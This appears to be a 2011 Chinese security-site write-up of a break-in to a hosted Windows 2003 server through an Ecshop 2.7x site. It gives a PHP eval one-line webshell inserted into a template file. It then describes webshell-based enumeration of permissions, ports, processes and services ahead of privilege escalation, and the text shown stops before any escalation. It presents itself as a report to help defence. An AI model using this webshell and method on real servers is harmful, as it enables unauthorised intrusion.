热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

检测某IDC服务器 从入侵提权谈主机防御

发布时间:2011-01-09 22:12文章来源:黑白前线文章作者:过客 点击次数:
摘要:图文:黑白前线/udb311 主题:检测某IDC服务器 从入侵提权谈主机防御 前言: 记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。 目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u 目标网站:Ecshop2.7x 提权: 通常步骤 1...

图文:黑白前线/udb311

主题:检测某IDC服务器入侵提权谈主机防御

前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。

 

目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u
目标网站:Ecshop2.7x


提权:
通常步骤
1、 上传asp webshell检测可用组件,端口,目录。
2、 上传aspx webhsell 测试执行命令,获取进程、服务、端口信息

 

入手


Echop2.7x暴过几个注入,很容易取到后台登录密码。
这个利用方法百度都有,不在一一描述。
后台Getshell,也有很多方法。这里用到模块管理-库项目管理-选择myship.lbi里插入<?php eval($_POST['c'])?>
连接http://site/myship.php一句话

 

信息收集


一、 检测权限


1. 先php shell检测服务器上的目录浏览权限,D:/wwwroot/xxx/wwwroot/可以看出是IDC管理网站的做法,独立用户单独权限处理当前用户无法跳转跨目录。
另外,C D E F盘都无浏览权限。因为PHP和ASP继承的是IIS用户的权限,所以都不能列出目录。


2. 列出程序目录,如图

入侵提权1


360、Microsoft SQL Server先想到两种提权方法

 

二、 检测目标服务


上传asp shell检测服务器组件
1. wscript.shell × 命令行执行组件 不支持


2. 常用端口
  127.0.0.1:1433.........开放
  127.0.0.1:3389.........关闭
  127.0.0.1:43958.........开放


3. C:\Documents and Settings\All Users\ 无权限访问
 C:\Documents and Settings\All Users\「开始」菜单\程序\ 无权限访问
C:\Documents and Settings\All Users\Documents\ 可读取写入


4.查看系统服务-用户账号  对象不支持此属性或方法(禁用了Workstation


5. 查看管理员  他奶奶的不行啊:Wscript.Network (禁用了Wscript.Network

 

上传aspx shell检测服务器可执行命令


1. ASPX继承users组权限,对C D E F盘都无浏览权限。

2. 默认调用 c:\windows\system32\cmd.exe无权访问。

入侵提权2

3. IIS SPY可列IIS用户、密码、域名以及本地路径。
入侵提权3


4. Process列出进程,可利用如下
  1 1176 hzclient 华众主机客户端
  12 1588 r_server Radmin控制服务端
  18 10660 shstat mcafee杀毒
  55 3548 SERVUTRAY serv-u服务端
  73 10892 mysqld mysql数据库


5. Services列出服务,可利用如下
  29 1176 HZCLIENT D:\hzhost\hzclient.exe
  72 1588 r_server "C:\WINDOWS\system32\r_server.exe" /service
  41 1312 McShield "C:\Program Files\McAfee\VirusScan Enterprise\Mcshield.exe"
  50 10892 MySQL51 "E:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" --defaults-file="E:\Program Files\MySQL\MySQL Server 5.1\my.ini" MySQL51
  79 5708 Serv-U E:\program files\Serv-U\ServUDaemon.exe

 

标签分类:

上一篇:Windows 2008 Server 密码获取攻略
下一篇:菜鸟Linux处女航之权限提升